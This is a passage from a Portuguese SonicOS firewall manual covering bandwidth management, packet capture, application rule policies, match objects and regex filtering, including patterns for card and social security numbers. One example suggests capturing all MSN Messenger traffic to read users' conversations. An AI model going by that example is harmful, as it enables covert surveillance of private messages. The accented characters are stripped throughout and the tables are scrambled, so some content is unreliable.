Aes usando o gerenciamento de largura de banda na pgina 578
Aes usando o monitoramento de pacotes na pgina 581
Criar regra a partir do monitor de AppFlow na pgina 582
Criao de poltica de controle de aplicativos avanado na pgina 584
Criao de poltica de regras de aplicativos na pgina 584
Objetos de correspondncia na pgina 589
Objetos da lista de aplicativos na pgina 600
Objetos de ao na pgina 602
Objetos de endereo de e-mail na pgina 605

Aes usando o gerenciamento de largura de banda
O gerenciamento de largura de banda (BWM) de camada de aplicativo permite criar polticas

que controlam o consumo de largura de banda por tipos especficos de arquivos dentro de um
protocolo e, ao mesmo tempo, permitindo que outros tipos de arquivos usem a largura de
banda de forma ilimitada. Isso permite que voc faa distino entre o trfego desejvel e
indesejvel no mesmo protocolo. O gerenciamento de largura de banda de camada de
aplicativo suportado por todas as correspondncias de aplicativos, bem como por polticas
de regras de aplicativos personalizadas usando cliente HTTP, servidor HTTP e tipos de
transferncias de arquivos de FTP e personalizadas. Para obter detalhes sobre os tipos de
polticas, consulte Criao de poltica de regras de aplicativos na pgina 584.
Se o Tipo de gerenciamento de largura de banda na pgina Configuraes de firewall >
BWM estiver configurada para Global, a funcionalidade de gerenciamento de largura de banda
de camada de aplicativo suportada por oito nveis de prioridade de BWM predefinidos
padro, disponveis ao adicionar uma poltica a partir da pgina Firewall > Regras de
aplicativos. Tambm existe uma ao Tipo de gerenciamento de largura de banda
personalizvel, disponvel ao adicionar uma nova ao a partir da tela Firewall > Objetos de
ao.
O gerenciamento de largura de banda tambm pode ser configurado na pgina Monitor de
AppFlow selecionando um aplicativo de tipo de servio ou um aplicativo de tipo de assinatura
e, em seguida, clicando no boto Criar regra. As opes de gerenciamento de largura de banda
disponveis dependem dos nveis de prioridade habilitados na tabela da fila de prioridade
Global na pgina Configuraes de firewall > BWM. Os nveis de prioridade habilitados por
padro so Alto, Mdio ou Baixo.
Todo o gerenciamento de largura de banda de aplicativos est associado ao gerenciamento de
largura de banda global, o qual configurado na pgina Configuraes de firewall > BWM.
Esto disponveis dois tipos de gerenciamento de largura de banda: Avanado e Global.
Quando o tipo estiver definido para Avanado, o gerenciamento de largura de banda pode
ser configurado separadamente para Regra de aplicativo.
Quando o tipo estiver definido para Global, o gerenciamento de largura de banda
configurado pode ser aplicado globalmente a todas as interfaces em todas as zonas.

Figura 13 Pgina Configuraes de firewall > BWM
Como prtica recomendada, a configurao das configuraes do Gerenciamento de largura

de banda na pgina Configuraes de firewall > BWM deve ser sempre realizada antes da
configurao de quaisquer polticas de BWM.
A alterao do Tipo de gerenciamento de largura de banda na pgina Configuraes de
firewall > BWM de Avanado para Global desabilita o BWM em todas as Regras de acesso.
Porm, os objetos de ao de BWM padro nas polticas de Controle de aplicativos so
convertidos para as configuraes de gerenciamento de largura de banda globais.
Ao alterar o Tipo de gerenciamento de largura de banda de Global para Avanado, as
aes de BWM padro usadas em quaisquer polticas de Regras de aplicativos so
automaticamente convertidas para BWM avanado mdio, independentemente do nvel para
o qual foram configuradas antes da alterao.
Aes de BWM padro

Ao alternar entre Avanado e Global, as aes de BWM padro so convertidas para BWM
global mdio. O firewall no armazena seus nveis de prioridade anteriores ao alternar entre
os tipos. possvel ver as conversas na pgina Firewall > Regras de aplicativos.
Aes de BWM personalizadas

As aes de BWM personalizadas comportam-se de maneira diferente em relao s aes
de BWM padro. As aes de BWM personalizadas so configuradas criando objetos de ao
na pgina Firewall > Objetos de ao. As aes de gerenciamento de largura de banda
personalizadas e as polticas que usam essas aes mantm suas configuraes de prioridade
sempre que o Tipo de gerenciamento de largura de banda seja alternado entre Global e
Avanado.
A figura seguinte mostra a mesma poltica depois de o Tipo de gerenciamento de largura de
banda global ser definido para Global. Apenas a Prioridade aparece na dica de ferramenta,
uma vez que nenhum valor configurado na Fila de prioridade global para largura de banda
mxima ou garantida para o nvel 5.

Figura 14 Ao de BWM personalizada na poltica com tipo de BWM global
Se o Tipo de gerenciamento de largura de banda for configurado para Global, a tela

Adicionar/Editar objeto de ao fornecer a opo Prioridade de largura de banda, mas usar
os valores que so especificados na tabela Prioridade na pgina Configuraes de firewall
> BWM para Largura de banda garantida e Largura de banda mxima.
A Figura 15 mostra as selees de Prioridade de largura de banda na tela Adicionar/Editar
objetos de ao quando o Tipo de gerenciamento de largura de banda global est
configurado para Global na pgina Configuraes de firewall > BWM.
Figura 15 Pgina Adicionar/editar objetos de ao com tipo de BWM global
Nota Todas as prioridades so exibidas (Em tempo real Mais baixa), independentemente de
terem ou no sido configuradas. Consulte a pgina Configuraes de firewall > BWM para
determinar quais as prioridades habilitadas. Se o Tipo de gerenciamento de largura de
banda estiver configurado para Global e voc selecionar uma Prioridade de largura de
banda que no esteja habilitada, o trfego ser automaticamente mapeado para a
prioridade de nvel 4 (Mdio).

A configurao de gerenciamento de largura de banda de camada de aplicativo tratada da
mesma forma que a configurao de gerenciamento de largura de banda das Regras de
acesso. Ambas esto relacionadas com as configuraes globais de gerenciamento de largura
de banda. No entanto, com o Controle de aplicativos voc pode especificar todos os tipos de
contedo, o que no possvel fazer com regras de acesso.
No caso de uso do gerenciamento de largura de banda, enquanto administrador voc pode
desejar limitar os downloads de arquivos .mp3 e executveis durante as horas de trabalho para
no mais que 1 Mbps. Ao mesmo tempo, voc deseja permitir downloads de tipos de arquivos
produtivos como .doc ou .pdf at o mximo de largura de banda disponvel ou at mesmo
habilitar a prioridade mais alta possvel para downloads de contedo produtivo. Como outro
exemplo, voc pode limitar a largura de banda para um determinado tipo de trfego de ponto
a ponto (P2P), mas permitir que outros tipos de P2P usem a largura de banda de forma
ilimitada. O gerenciamento de largura de banda de camada de aplicativo permite que voc crie
polticas para tal.
Tambm esto disponveis diversas opes de ao de BWM na lista de aes padro
predefinidas. As opes de ao de BWM mudam, dependendo da configurao do Tipo de
gerenciamento de largura de banda na pgina Configuraes de firewall > BWM. Se o
Tipo de gerenciamento de largura de banda estiver configurado para Global, as oito
prioridades so selecionveis. Se o Tipo de gerenciamento de largura de banda estiver
configurado para Avanado, nenhuma prioridade selecionvel, mas as prioridades
predefinidas esto disponveis ao adicionar uma poltica.
A tabela seguinte mostra as aes padro predefinidas que esto disponveis ao adicionar uma
poltica.
Sempre disponvel Se tipo de BWM = Global Se tipo de BWM = Avanado

Redefinir/descartar 0 Em tempo real BWM avanado baixo
Nenhuma ao 1 Mais alta BWM avanado mdio
Ignorar DPI 2 Alta BWM avanado alto
Monitor de pacotes 3 Mdia alta
4 Mdia
5 Mdia baixa
6 Baixa
7 Mais baixa
Nota A largura de banda garantida para todos os nveis de BWM combinado no deve exceder
100%.
Aes usando o monitoramento de pacotes
Quando a ao predefinida de monitor de pacotes estiver selecionada para uma poltica, o

SonicOS capturar ou espelhar o trfego de acordo com as configuraes realizadas na
pgina Painel > Monitor de pacotes ou Sistema > Monitor de pacotes. O padro criar um
arquivo de captura que voc pode visualizar com o Wireshark. Quando voc tiver configurado
uma poltica com a ao de monitor de pacotes, voc ainda precisa clicar em Iniciar captura
na pgina Monitor de pacotes para realmente capturar todos os pacotes. Depois de capturados
os pacotes desejados, clique em Parar captura.
Para controlar a ao Monitor de pacotes para capturar somente os pacotes relacionados com
a sua poltica, clique em Configurar na pgina Monitor de pacotes e selecione Habilitar filtro
com base na regra de aplicativo/firewall na guia Filtro de monitor (consulte a Figura 16).
Neste modo, aps voc clicar em Iniciar captura na pgina Monitor de pacotes, os pacotes
no so capturados at que algum trfego acione a poltica de controle de aplicativos (ou a
regra de acesso do firewall). Voc poder ver a mensagem de alerta na pgina Log > Ver

quando a poltica for acionada. Isso funciona quando o monitor de pacotes estiver selecionado
nas polticas de controle de aplicativos criadas com o boto Criar regra ou com o mtodo de
regras de aplicativos usando um objeto de ao ou nas regras de acesso do firewall e permite
que voc especifique a configurao ou a filtragem para o que deseja capturar ou espelhar.
Voc poder baixar a captura em formatos diferentes e visualiz-la em uma pgina da Web,
por exemplo.
Figura 16 Guia Monitor de pacotes Filtro de monitor
Para configurar o espelhamento, consulte a guia Espelho e selecione uma interface para a
qual deseja enviar o trfego espelhado no campo Pacotes filtrados do espelho para
interface, em Configuraes locais de espelho. Voc tambm pode configurar uma das
configuraes remotas. Isso permite espelhar os pacotes do aplicativo para outro computador
e armazenar tudo no disco rgido. Por exemplo, voc pode capturar o trfego de todos do MSN
Instant Messenger e ler as conversas.
Criar regra a partir do monitor de AppFlow
A pgina Painel > Monitor de AppFlow fornece um boto Criar regra. Se, ao visualizar o
monitor de AppFlow, voc visualizar um aplicativo que parece suspeito ou que est usando
quantidades excessivas de largura de banda, voc pode simplesmente selecionar o aplicativo
na lista e, em seguida, clicar em Criar regra e configurar uma poltica de controle de aplicativos
para ele imediatamente. Voc tambm pode selecionar vrios aplicativos e, em seguida, usar
a opo Criar regra para configurar uma poltica que se aplica a todos eles.
Nota Os aplicativos gerais no podem ser selecionados. Os aplicativos de tipo de servio e

assinatura no podem ser misturados em uma nica regra.
A Figura 17 mostra a janela Criar regra exibida na pgina Painel > Monitor de AppFlow.

Figura 17 Pgina Painel > Monitor de AppFlow com a janela Criar regra
O recurso Criar regra est disponvel no monitor de AppFlow na configurao da pgina de

visualizao de lista. O boto Criar regra est visvel, mas desabilitado, no grfico de pizza e
nas visualizaes grficas de monitoramento.
Voc pode configurar os seguintes tipos de polticas na janela Criar regra:
Bloquear o aplicativo ser completamente bloqueado pelo firewall
Gerenciamento de largura de banda escolha um dos nveis de BWM para usar o
gerenciamento de largura de banda global para controlar a largura de banda usada pelo
aplicativo, independentemente de qual interface atravessa
Nota O gerenciamento de largura de banda deve ser habilitado em cada interface

onde voc deseja us-lo. Voc pode configurar as interfaces na pgina Rede >
Interfaces.
Monitor de pacotes captura pacotes do aplicativo para exame e anlise

Depois de selecionar a ao desejada para a regra e, em seguida, clicar em Criar regra dentro
da janela Criar regra, uma poltica de controle de aplicativos automaticamente criada e
adicionada tabela Polticas de regras de aplicativos na pgina Firewall > Regras de
aplicativos.
A janela Criar regra contm um boto Configurar prximo da seo Gerenciamento de largura
de banda que leva voc para a pgina Configuraes de firewall > BWM onde possvel
configurar a fila de prioridade global. Para obter mais informaes sobre o gerenciamento de
largura de banda global e a pgina Configuraes de firewall > BWM, consulte Aes usando
o gerenciamento de largura de banda na pgina 578. As opes de gerenciamento de largura
de banda que voc visualiza na janela Criar regra refletem as opes que esto habilitadas na
fila de prioridade global. Os valores padro so:
BWM global alto 30% garantidos; mx./estouro de 100%

BWM global mdio 50% garantidos; mx./estouro de 100%
BWM global baixo 20% garantidos; mx./estouro de 100%
Criao de poltica de controle de aplicativos avanado
O mtodo de configurao na pgina Firewall > Controle de aplicativos avanado permite um

controle granular de categorias especficas, aplicativos ou assinaturas. Isso inclui controle
granular de registros, incluso e excluso granulares de usurios, grupos ou intervalos de
endereos IP e a configurao de cronograma. As configuraes aqui so polticas globais e
independentes de qualquer poltica personalizada de regras de aplicativos. A pgina Firewall
> Controle de aplicativos avanado mostrada abaixo.
possvel definir as seguintes configuraes nesta pgina:

Selecionar uma categoria, um aplicativo ou uma assinatura.
Selecionar o bloqueio, registro ou ambas as opes como a ao.
Especificar usurios, grupos ou intervalos de endereos IP para incluir ou excluir da ao.
Definir um cronograma para impor os controles.
Enquanto estas configuraes do controle de aplicativos so independentes das polticas de
regras de aplicativos, voc tambm pode criar objetos de correspondncia de aplicativos para
qualquer categoria, aplicativo ou assinatura disponvel aqui ou na pgina Firewall > Objetos de
correspondncia e usar esses objetos de correspondncia em uma poltica de regras de
aplicativo. Isso permite que voc use a ampla gama de aes e outras opes de configurao
disponveis com o Controle de aplicativos. Consulte Objetos da lista de aplicativos na
pgina 600 para obter mais informaes sobre essa interface de usurio com base em polticas
para o controle de aplicativos.
Criao de poltica de regras de aplicativos
Voc pode usar o Controle de aplicativos para criar polticas personalizadas de regras de
aplicativos para controlar aspectos especficos de trfego em sua rede. Uma poltica um
conjunto de objetos de correspondncia, propriedades e aes de preveno especficas.
Quando voc cria uma poltica, primeiro cria um objeto de correspondncia e, em seguida,
seleciona e personaliza opcionalmente uma ao, referenciando-os ao criar a poltica.

Na pgina Firewall > Regras de aplicativos, voc pode acessar a tela Configuraes de
polticas mostrada abaixo para um tipo de poltica de cliente SMTP. A tela muda dependendo
do tipo de poltica que voc selecionar.
Alguns exemplos de polticas incluem:

Bloquear aplicativos quanto a atividades, como jogos de azar
Desabilitar anexos de e-mail .exe e .vbs
No permitir o navegador Mozilla em conexes HTTP de sada
No permitir envio de e-mail ou anexos MS Word com as palavras-chave "Confidencial da
Dell SonicWALL", exceto do CEO e CFO
No permitir envio de e-mail que inclui um grfico ou uma marca-dgua encontrado(a) em
todos os documentos confidenciais
Quando voc cria uma poltica, deve selecionar um tipo de poltica. Cada tipo de poltica
especifica os valores ou tipos de valores que so vlidos para a origem, o destino, o tipo de
objeto de correspondncia e os campos de ao na poltica. Voc pode definir a poltica para
incluir ou excluir usurios especficos ou grupos, selecionar um cronograma, ativar registros e
especificar o lado da conexo, bem como os tipos de direo bsico ou avanado. Um tipo de
direo bsico indica simplesmente a entrada ou a sada. Um tipo de direo avanado permite
a configurao de direo de zona para zona, tal como de LAN para WAN.

A tabela a seguir descreve as caractersticas dos tipos disponveis de polticas de regras de
aplicativos.
Servio Servio de Tipo de

de origem destino objeto de
Tipo de vlido/ vlido/ correspond Tipo de ao Lado da
poltica Descrio padro padro ncia vlido vlido conexo
Contedo Poltica N/D N/D Lista de Redefinir/ N/D
do controle usando categorias de descartar,
de Controle de aplicativo, Nenhuma ao,
aplicativos aplicativos Lista de Ignorar DPI,
dinmico aplicativos, Monitor de
relacionado Lista de pacotes,
com objetos assinatura de BWM Global-*,
de qualquer aplicativo BWM WAN *
protocolo de
camada de
aplicativo
CFS Poltica de N/D N/D Lista de Pgina de N/D
filtragem de categorias do bloqueio de CFS,
contedo CFS Monitor de
pacotes,
Nenhuma ao,
BWM Global-*,
BWM WAN *
Poltica Poltica Qualquer/ Qualquer/ Objeto Redefinir/ Do lado do
personaliza usando qualquer qualquer personalizado descartar, cliente, Do
da objetos Ignorar DPI, lado do
personalizad Monitor de servidor,
os para pacotes, Ambos
qualquer Nenhuma ao,
protocolo de BWM Global-*,
camada de BWM WAN *
aplicativo;
pode ser
usada para
criar
assinaturas
personalizad
as estilo IPS
Cliente FTP Qualquer Qualquer/ Controle de Comando FTP, Redefinir/ Do lado do
comando qualquer FTP/Controle Comando FTP descartar, cliente
FTP de FTP + Valor, Objeto Ignorar DPI,
transferido personalizado Monitor de
por meio do pacotes,
canal de Nenhuma ao
controle de
FTP
Pedido de Uma Qualquer/ Controle de Nome de Redefinir/ Do lado do
carregame tentativa de qualquer FTP/Controle arquivo, descartar, cliente
nto de carregar um de FTP extenso de Ignorar DPI,
arquivo de arquivo por arquivo Monitor de
cliente FTP FTP pacotes,
(comando Nenhuma ao,
STOR) BWM Global-*,
BWM WAN *

Pedido de Uma Qualquer/ Controle de Nome de Redefinir/ Do lado do
download tentativa de qualquer FTP/Controle arquivo, descartar, cliente
de arquivo baixar um de FTP extenso de Ignorar DPI,
de cliente arquivo por arquivo Monitor de
FTP FTP pacotes,
(comando Nenhuma ao,
RETR) BWM Global-*,
BWM WAN *
Poltica de Dados Qualquer/ Qualquer/ Objeto do Redefinir/ Ambos
transfernci transferidos qualquer qualquer contedo do descartar,
a de dados pelo canal de arquivo Ignorar DPI,
de FTP dados FTP Monitor de
pacotes,
Nenhuma ao
Cliente Poltica que Qualquer/ Qualquer/ Host HTTP, Redefinir/ Do lado do
HTTP se aplica a qualquer HTTP Cookie HTTP, descartar, cliente
trfego do (configurvel) Referenciador Ignorar DPI,
navegador HTTP, Monitor de
da Web ou Cabealho pacotesa,
qualquer personalizado Nenhuma ao,
solicitao de solicitao BWM Global-*,
HTTP que HTTP, BWM WAN *
tem origem Contedo de
no cliente URI de HTTP,
Agente do
usurio HTTP,
Navegador da
Web, Nome do
arquivo, Objeto
personalizado
de extenso
de arquivo
Servidor Resposta Qualquer/ Qualquer/ ID de classe Redefinir/ Do lado do
HTTP originada por HTTP qualquer de ActiveX, descartar, servidor
um servidor (configurv Cookie Ignorar DPI,
HTTP el) definido para Monitor de
HTTP, pacotes,
Resposta Nenhuma ao,
HTTP, Objeto BWM Global-*,
de contedo BWM WAN *
do arquivo,
Cabealho
personalizado,
Objeto
personalizado

Contedo Poltica N/D N/D Lista de Redefinir/ N/D
do IPS usando categorias de descartar,
objetos assinatura IPS, Ignorar DPI,
dinmicos Lista de Monitor de
relacionados assinatura IPS pacotes,
preveno Nenhuma ao,
de intruso BWM Global-*,
para BWM WAN *
qualquer
protocolo de
camada de
aplicativo
Cliente Polticas para Qualquer/ POP3 Objeto Redefinir/ Do lado do
POP3 inspecionar qualquer (recuperar personalizado descartar, cliente
trfego e-mail)/POP3 Ignorar DPI,
gerado por (recuperar Monitor de
um cliente e-mail) pacotes,
POP3; Nenhuma ao
tipicamente
til para um
administrador
de servidor
POP3
Servidor Poltica para POP3 Qualquer/ Corpo do Redefinir/ Do lado do
POP3 inspecionar (recuperar qualquer e-mail, CC do descartar, servidor
e-mail e-mail)/ e-mail, E-mail Desabilitar
baixado de POP3 de, E-mail anexo, Ignorar
um servidor (recuperar para, Assunto DPI, Nenhuma
POP3 para e-mail) do e-mail, ao
um cliente Nome do
POP3; usada arquivo,
para Extenso de
filtragem de arquivo,
e-mail Cabealho
personalizado
MIME
Cliente Poltica que Qualquer/ SMTP (enviar Corpo do Redefinir/ Do lado do
SMTP se aplica a qualquer e-mail)/SMTP e-mail, CC do descartar, cliente
trfego de (enviar e-mail, E-mail Bloquear e-mail
SMTP que e-mail) de, E-mail para, SMTP sem
tem origem Tamanho do resposta, Ignorar
no cliente e-mail, Assunto DPI, Monitor de
do e-mail, Objeto pacotes,
personalizado, Nenhuma ao
Contedo do
arquivo, Nome
do arquivo,
Extenso do
arquivo,
Cabealho
personalizado
MIME,
a.A ao do monitor de pacotes no suportada por Nome do arquivo ou Objeto personalizado de extenso de arquivo.

Objetos de correspondncia
Os objetos de correspondncia representam o conjunto de condies que devem ser

combinadas para a ocorrncia de aes. Isto inclui o tipo de objeto, o tipo de correspondncia
(exata, parcial, regex, prefixo ou sufixo), a representao de entrada (texto ou hexadecimal) e
o contedo atual para corresponder. Os objetos de correspondncia foram referidos como
objetos do aplicativo em verses anteriores.
A representao de entrada hexadecimal usada para corresponder contedo binrio, como
arquivos executveis, enquanto a representao de entrada alfanumrica (texto) usada para
corresponder, por exemplo, arquivos ou contedo de e-mail. Voc tambm pode usar uma
representao de entrada hexadecimal para contedo binrio encontrado em uma imagem
grfica. A representao de entrada de texto poderia ser usada para fazer corresponder o
mesmo grfico se ele contiver uma determinada cadeia de caracteres em um de seus campos
de propriedades. As expresses regulares (regex) so usadas para fazer corresponder um
padro em vez de uma cadeia de caracteres ou valor especfica(o) e usar representao de
entrada alfanumrica.
O tipo de objeto de correspondncia de contedo de arquivo oferece uma maneira de fazer
corresponder um padro ou uma palavra-chave em um arquivo. Este tipo de objeto de
correspondncia s pode ser usado com transferncia de dados de FTP, servidor HTTP ou
polticas de cliente SMTP.
A tabela a seguir descreve os tipos de objeto de correspondncia suportados.
Tipos de Correspon
correspondn dncia Propriedades
Tipo de objeto Descrio cia negativa adicionais
ID de classe de ActiveX ID de classe de um Exato No Nenhum
componente Active-X.
Por exemplo, a ID de
classe de um
componente Gator
Active-X "c1fb8842-
5281-45ce-a271-
8fd5f117ba5f".
Lista de categorias de Permite a N/D No Nenhum
aplicativo especificao de
categorias de
aplicativos, como
Multimdia, P2P ou
Redes sociais
Lista de aplicativos Permite a N/D No Nenhum
especificao de
aplicativos individuais
dentro da categoria de
aplicativos que voc
selecionar
Lista de assinatura de Permite a N/D No Nenhum
aplicativo especificao de
assinaturas individuais
para o aplicativo e a
categoria que voc
selecionar

Tipos de Correspon
Lista de permisso/ Permite a Exato, parcial, No Nenhum
proibio do CFS especificao de prefixo, sufixo
domnios permitidos ou
proibidos para filtragem
de contedo
Lista de categorias do Permite a seleo de N/D No Uma lista de 64
CFS uma ou mais categorias fornecida
categorias de filtragem para possibilitar a
de contedo escolha
Objeto personalizado Permite a Exato No Existem 4 parmetros
especificao de um adicionais e opcionais
conjunto de condies que podero ser
personalizado estilo definidos:
IPS. deslocamento
(descreve a partir de
que byte em carga de
pacote dever ter incio
a correspondncia
com o padro
comea com 1; ajuda a
reduzir os falsos
positivos na
correspondncia),
profundidade
(descreve em que byte
na carga de pacote
dever parar a
correspondncia do
padro comea com
1), tamanho mnimo de
carga e tamanho
mximo de carga.
Corpo do email Qualquer contedo no Parcial No Nenhum
corpo de um e-mail.
CC do e-mail Qualquer contedo no Exato, parcial, Sim Nenhum
(cabealho MIME) cabealho MIME de prefixo, sufixo
CC.
E-mail de (cabealho Qualquer contedo no Exato, parcial, Sim Nenhum
MIME) cabealho MIME de prefixo, sufixo
De.
Tamanho do e-mail Permite a N/D No Nenhum
especificao do
tamanho mximo do
e-mail que possa ser
enviado.
Assunto do e-mail Qualquer contedo no Exato, parcial, Sim Nenhum
(cabealho MIME) cabealho MIME de prefixo, sufixo
Assunto.
E-mail para (cabealho Qualquer contedo no Exato, parcial, Sim Nenhum
MIME) cabealho MIME de prefixo, sufixo
Para.

Tipos de Correspon
Cabealho Permite a criao de Exato, parcial, Sim necessrio
personalizado MIME cabealhos prefixo, sufixo especificar um nome
personalizados MIME. do cabealho
personalizado.
Contedo do arquivo Permite especificar um Parcial No A ao "Desabilitar
padro que anexo" nunca deve ser
corresponda ao aplicada a este objeto.
contedo de um
arquivo. O padro
corresponder mesmo
que o arquivo esteja
compactado.
Nome do arquivo Em casos de e-mail, Exato, parcial, Sim Nenhum
este o nome de um prefixo, sufixo
anexo. Em casos de
HTTP, este o nome
do arquivo de um
anexo carregado para
a conta de e-mail da
Web. Em casos de
FTP, o nome de um
arquivo carregado ou
baixado.
Extenso do nome do Em casos de e-mail, Exato Sim Nenhum
arquivo uma extenso do nome
do arquivo de anexo.
Em casos de HTTP,
uma extenso do nome
do arquivo de um
anexo carregado para
a conta de e-mail da
Web. Em casos de
FTP, uma extenso
do nome de um arquivo
carregado ou baixado.
Comando FTP Permite a seleo de N/D No Nenhum
comandos FTP
especficos.
Comando FTP + Valor Permite a seleo de Exato, parcial, Sim Nenhum
comandos FTP prefixo, sufixo
especficos e
respectivos valores.
Cabealho de cookie Permite a Exato, parcial, Sim Nenhum
HTTP especificao de um prefixo, sufixo
cookie enviado por um
navegador.

Tipos de Correspon
Cabealho de host Contedo encontrado Exato, parcial, Sim Nenhum
HTTP no cabealho de host prefixo, sufixo
HTTP. Representa o
nome do host do
servidor de destino na
solicitao HTTP, como
www.google.com.
Cabealho de Permite a Exato, parcial, Sim Nenhum
referenciador HTTP especificao de prefixo, sufixo
contedo de um
cabealho de
referenciador enviado
por um navegador
isso pode ser til para
controlar ou manter o
registro de estatsticas
dos sites da Web que
redirecionaram um
usurio para o site da
Web do cliente.
Cabealho Permite o tratamento Exato, parcial, Sim necessrio
personalizado de de cabealhos prefixo, sufixo especificar um nome
solicitao HTTP personalizados de do cabealho
solicitao HTTP. personalizado.
Cabealho Permite o tratamento Exato, parcial, Sim necessrio
personalizado de de cabealhos prefixo, sufixo especificar um nome
resposta HTTP personalizados de do cabealho
resposta HTTP. personalizado.
Cabealho de cookie Cabealhos de cookies Exato, parcial, Sim Nenhum
definido para HTTP definidos. Fornece uma prefixo, sufixo
forma para no permitir
que determinados
cookies sejam
definidos em um
navegador.
Contedo de URI de Qualquer contedo Exato, parcial, No Nenhum
HTTP encontrado no URI na prefixo, sufixo
solicitao HTTP.
Cabealho de agente Qualquer contedo em Exato, parcial, Sim Nenhum
do usurio HTTP um cabealho de prefixo, sufixo
agente do usurio. Por
exemplo: Agente do
usurio: Skype.
Navegador da Web Permite a seleo de N/D Sim Nenhum
navegadores da Web
especficos (MSIE,
Netscape, Firefox,
Safari, Chrome).

Tipos de Correspon
Lista de categorias de Permite a seleo de N/D No Nenhum
assinatura IPS um ou mais grupos de
assinatura de IPS.
Cada grupo contm
vrias assinaturas de
IPS predefinidas.
Lista de assinatura IPS Permite a seleo de N/D No Nenhum
uma ou mais
assinaturas de IPS
especficas para maior
granularidade.
Voc pode ver os tipos de objetos de correspondncia disponveis na lista suspensa na tela
Configuraes do objeto de correspondncia.
Na tela Objetos de correspondncia, voc poder adicionar vrias entradas para criar uma lista
de elementos de contedo para corresponder. Todo o contedo que voc fornea em um objeto
de correspondncia sensvel a maisculas e minsculas por motivos de correspondncia.
Uma representao hexadecimal usada para corresponder contedo binrio. possvel usar
um editor hexadecimal ou um analisador de protocolo de rede como o Wireshark para obter o
formato hexadecimal de arquivos binrios. Para obter mais informaes sobre essas
ferramentas, consulte as seguintes sees:
Wireshark na pgina 634
Editor hexadecimal na pgina 637

Voc pode usar o boto Carregar a partir de arquivo para importar contedo de arquivos
de texto predefinidos que contenham vrias entradas para a correspondncia de um objeto
de correspondncia. Cada entrada no arquivo deve estar em sua prpria linha. O recurso
Carregar a partir de arquivo permite facilmente mover as configuraes de Controle de
aplicativos a partir de um firewall para outro.
Vrias entradas, de um arquivo de texto ou inseridas manualmente, so exibidas na rea de
Lista. realizada a correspondncia de entradas de lista usando o OU lgico e, se algum item
na lista for correspondido, a ao para a poltica executada.
Um objeto de correspondncia pode incluir um total de no mais de 8000 caracteres. Se cada
elemento em um objeto de correspondncia contiver aproximadamente 30 caracteres, voc
poder inserir cerca de 260 elementos. O tamanho mximo do elemento de 8000 bytes.
Expresses comuns
Voc pode configurar as expresses comuns em determinados tipos de objetos de
correspondncia para usar em polticas de regras de aplicativos. A pgina Configuraes do
objeto de correspondncia permite configurar expresses comuns personalizadas ou
selecionar expresses comuns predefinidas. A implementao da Dell SonicWALL suporta a
correspondncia de expresses comuns no trfego de rede sem ser necessria nova
montagem. Isso significa que nenhum armazenamento em buffer do fluxo de entrada
necessrio e que realizada a correspondncia de padres em limites de pacotes.

O SonicOS fornece as seguintes expresses comuns predefinidas:
CC VISA Nmero do carto de crdito VISA

NSS EUA Nmero da previdncia social dos EUA
SIN CANADENSE Nmero de previdncia social canadense
NMERO DE Nmero de encaminhamento dos banqueiros
ENCAMINHAMENTO ABA americanos
CC AMEX Nmero do carto de crdito American Express
CC MASTERCARD Nmero do carto de crdito Mastercard
CC DISCOVER Nmero do carto de crdito Discover
As polticas que usam expresses regulares iro corresponder primeira ocorrncia do padro
no trfego de rede. Isto habilita as aes em correspondncias assim que possvel. Uma vez
que a correspondncia realizada no trfego de rede e no apenas no texto legvel, o alfabeto
de correspondncia inclui o conjunto de caracteres ASCII completo 256 caracteres.
As expresses comuns populares primitivas como "." (o curinga de qualquer caractere), "*",
"?", "+", contagem de repetio, alternativa e negao so suportadas. Embora a sintaxe e a
semntica sejam semelhantes s implementaes de expresses comuns populares, como
Perl, vim e outros, existem algumas diferenas mnimas. Por exemplo, os operadores de incio
(^) e de fim de linha ($) no so suportados. Alm disso, "\z" se refere ao conjunto de dgitos
diferentes de zero [19], no no final da cadeia de caracteres como em Perl. Para obter
informaes sobre sintaxe, consulte Sintaxe de expresses comuns na pgina 596.
Uma diferena notvel com o mecanismo de expresses comuns Perl a falta de referncia
inversa e suporte substituio. Estes recursos so, de fato, externos s expresses
regulares e no podem ser realizados em tempo linear com relao aos dados que esto sendo
analisados. Portanto, para manter o desempenho mximo, eles no so suportados. A
funcionalidade de substituio ou converso no suportada porque o trfego de rede s
inspecionado, no modificado.

As expresses comuns predefinidas para padres frequentemente usados, como os nmeros
de previdncia social dos EUA e os nmeros de carto de crdito VISA, podem ser
selecionados ao criar o objeto de correspondncia. Os usurios podem criar as suas prprias
expresses no mesmo objeto de correspondncia. Essas expresses fornecidas por usurios
so analisadas e aquelas que no forem analisadas corretamente causaro um erro de sintaxe
para exibir na parte inferior da janela Configuraes do objeto de correspondncia. Depois
analisar com xito, a expresso comum ser transmitida para um compilador para criar as
estruturas de dados necessrias para a varredura do trfego de rede em tempo real.
As expresses regulares so combinadas com eficincia criando uma estrutura de dados
denominada Autmato Finito Determinstico (AFD). O tamanho do AFD determinado pela
expresso comum fornecida pelo usurio e limitado pelas capacidades de memria do
dispositivo. Um processo demorado de compilao para uma expresso regular complexa
pode consumir amplas quantidades de memria no dispositivo. Ele tambm pode levar at dois
minutos para criar o AFD, dependendo das expresses envolvidas.
Para evitar que haja abuso e ataques de negao de servio, juntamente com excesso de
impacto na capacidade de resposta de gerenciamento do dispositivo, o compilador pode
cancelar o processo e rejeitar expresses comuns que faro com que esta estrutura de dados
aumente demasiado para o dispositivo. Ser exibida a mensagem de erro "abuso detectado"
na parte inferior da janela.
Nota Durante uma compilao demorada, a sesso de gerenciamento do dispositivo poder ficar
temporariamente sem resposta, enquanto o trfego de rede continua a passar atravs do
dispositivo.
A criao do AFD para expresses com grandes contadores consome mais tempo e memria.
Essas expresses tm mais probabilidade de serem rejeitadas do que aquelas que utilizam
contadores indefinidos como os operadores "*" e "+".
As expresses que contm um grande nmero de caracteres em vez de um intervalo ou uma
classe de caracteres tambm podem ser rejeitadas. Isto , a expresso "(a|b|c|d|. . .|
z)" para especificar o conjunto de todas as letras minsculas tem mais probabilidade de ser
rejeitada do que a classe de caracteres equivalente "\l". Quando utilizado um intervalo como
"[a-z]", ele ser convertido internamente para "\l". No entanto, um intervalo como
"[d-y]" ou "[0-Z]" no pode ser convertido para nenhuma classe de caracteres, longo e
poder causar a rejeio da expresso que contm esse fragmento.
Sempre que uma expresso rejeitada, o usurio poder reescrev-la de uma forma mais
eficiente para evitar a rejeio usando algumas das dicas acima. Para obter informaes sobre
sintaxe, consulte Sintaxe de expresses comuns na pgina 596. Para um exemplo sobre como
gravar uma expresso comum personalizada, consulte Criar uma expresso comum em um
objeto de correspondncia na pgina 641.
